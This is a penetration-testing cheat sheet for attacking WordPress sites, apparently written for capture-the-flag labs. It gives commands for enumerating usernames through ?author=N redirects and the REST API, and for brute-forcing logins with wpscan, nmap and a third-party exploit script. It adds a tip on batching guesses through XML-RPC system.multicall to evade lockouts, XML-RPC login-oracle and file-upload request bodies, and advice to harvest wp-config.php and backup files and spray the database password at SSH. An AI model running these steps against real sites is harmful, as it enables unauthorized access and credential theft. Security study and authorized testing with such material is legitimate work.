WordPress

web, enum, wordpress

Version #

Credentials #

Recon #

# Kickoff nmap: http-wordpress-enum lists installed plugins/themes,
# http-wordpress-users enumerates usernames via the /?author=N archives
nmap -p80 --script http-wordpress-enum,http-wordpress-users 10.10.71.200

# Using wpscan (you can remove api token but some
# information will not be displayed)
# The token is for wpscan's vulnerability-database API: without it core,
# plugin and theme versions are still fingerprinted, but no known-vuln
# data is attached to them.
# NOTE: wpscan may not report all vulnerabilities, especially
# on plugins -- it only detects plugins it can see (passive by default);
# add -e vp,vt,u for vulnerable plugins/themes/users, and check plugin
# versions by hand against public advisories (the version is usually in
# /wp-content/plugins/<name>/readme.txt) before concluding "nothing found".
wpscan --url http://10.10.10.29 --api-token {API_TOKEN}

# Similar to above but on another path
# (WordPress is often installed under a sub-directory such as /wordpress
#  or /blog; a scan of the document root will miss it)
wpscan --url http://10.10.10.29/wordpress --api-token {API_TOKEN}

Interesting URL Paths #

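# you may find version here
# (wp-links-opml.php embeds a generator="WordPress/x.y" comment and
#  readme.html ships with every release; the homepage <meta name="generator">
#  tag and /feed/ leak the same version if these are blocked)
/wp-links-opml
/wp-links-opml.php
/readme.html

# uploads directory
# WordPress sorts uploads by year/month (YYYY/MM), not year/day; directory
# listing is frequently enabled, so browsing /wp-content/uploads/ itself
# often reveals everything without guessing names.
/wp-content/uploads/YYYY/MM/FILENAME

# login
/wp-login.php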

Interesting files #

# DB credentials
# Lives in the WordPress root (or one directory above it). Holds DB_NAME,
# DB_USER, DB_PASSWORD, DB_HOST plus the AUTH_KEY/SALT constants; the DB
# password is very often reused for SSH, phpMyAdmin or other services, so
# spray it. Also check for editor/backup leftovers the web server may hand
# out as plain text: wp-config.php.bak, wp-config.php~, wp-config.php.swp,
# wp-config.php.old, wp-config.txt.
wp-config.php

Brute Force #

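# Using nmap
nmap -p80 --script http-wordpress-brute 10.10.10.29

# User IDs can be extracted from here. For a valid ID WordPress answers
# with a redirect whose Location header ends in /author/<username>/, so
# the username is disclosed in the headers alone (hence -I).
# You can use burp sniper intruder, or simply loop over IDs 1-100 in bash.
curl -s -I -X GET http://10.10.10.29/?author=1
for i in $(seq 1 100); do curl -s -I -X GET "http://10.10.10.29/?author=$i" | grep -i '^location:'; done
# The REST API exposes the same usernames unauthenticated on default
# installs (users who have published posts):
curl -s http://10.10.10.29/wp-json/wp/v2/users

# You can use this python script from
# https://github.com/relarizky/wpxploit
# This can take around 30 minutes to complete
# TIP: try using "admin" as username first
# NOTE(review): the two trailing numeric arguments are undocumented here;
# check the script's usage/--help before relying on what they mean.
cd ~/data/tools/webapp/wpxploit
./exploit.py http://10.10.127.229/wordpress 5 15

# You can also use wpscan. rockyou is huge: expect lockouts/rate limiting
# from login-hardening plugins and start with a short targeted list. If
# xmlrpc.php is enabled, add --password-attack xmlrpc-multicall to batch
# many guesses into a single request (much faster and often bypasses
# wp-login.php-only lockout rules).
wpscan --url http://10.10.127.229/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt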
<!-- Credential check over XML-RPC: POST this body to /xmlrpc.php.
     Valid credentials return the list of blogs the user belongs to;
     bad credentials return a faultCode 403 "Incorrect username or
     password." fault. The two values are example credentials -- replace
     them with the pair under test. Untyped <value> elements are treated
     as strings by XML-RPC. -->
<methodCall>
  <methodName>
    wp.getUsersBlogs
  </methodName>
  <params>
    <param>
      <value>
        admin
      </value>
    </param>
    <param>
      <value>
        gansta1
      </value>
    </param>
  </params>
</methodCall>

Interesting URL Paths #

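# most can be reported by wpscan
/wp-content/uploads/
/wp-admin/
/wp-admin/update-core.php
/wp-admin/upgrade.php
# the installer lives under wp-admin/, not the document root; if it is
# still reachable on a half-configured site it may let you (re)install
/wp-admin/install.php
# runs scheduled tasks on every unauthenticated hit -- trivial to DoS,
# and interesting when a plugin's cron job does something exploitable
/wp-cron.php

# can accept post requests if active
# system.listMethods confirms it is enabled. Interesting methods:
#   wp.getUsersBlogs  -> login oracle for credential testing
#   system.multicall  -> batch many getUsersBlogs calls into one request
#   pingback.ping     -> server fetches a URL you supply (SSRF / internal
#                        port scan / DDoS reflection)
/xmlrpc.php

# others
/plugins
/wp-content/plugins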

For xmlrpc.php, you can use Burp Suite to send POST requests like the one below. Burp recalculates Content-Length for you; if you build the request by hand (curl, a raw socket), add a `Content-Type: text/xml` header and make Content-Length match the body exactly, otherwise the server will wait for more data or truncate the XML.

POST /wordpress/xmlrpc.php HTTP/1.1
Host: 10.10.10.29
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 95

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

XML RPC calls #

# List all method calls
<!-- Unauthenticated. A method list in the response proves XML-RPC is
     enabled; look for pingback.ping and system.multicall in the output. -->
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Get blogs
<!-- Doubles as a login oracle: good creds -> list of blogs, bad creds ->
     faultCode 403 "Incorrect username or password.". Wrap several of these
     calls in system.multicall to test many passwords per HTTP request. -->
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>

# Uploading a file
<?xml version='1.0' encoding='utf-8'?>
<!-- Requires an account with the upload_files capability (Author or
     above). WordPress checks the file name's extension against its
     allowed list, so a .php payload is rejected unless the account also
     has unfiltered_upload; the "type" member is only recorded as the
     attachment's MIME type, it does not bypass that check. On success the
     response contains the URL of the stored file under /wp-content/uploads/. -->
<methodCall>
	<methodName>wp.uploadFile</methodName>
	<params>
		<!-- blog_id: 1 on a single-site install -->
		<param><value><string>1</string></value></param>
		<param><value><string>username</string></value></param>
		<param><value><string>password</string></value></param>
		<param>
			<value>
				<struct>
					<member>
						<name>name</name>
						<value><string>filename.jpg</string></value>
					</member>
					<member>
						<name>type</name>
						<value><string>mime/type</string></value>
					</member>
					<member>
						<!-- raw file content, base64-encoded -->
						<name>bits</name>
						<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
					</member>
				</struct>
			</value>
		</param>
	</params>
</methodCall>

Themes #

Plugins #

Troubleshooting #

References #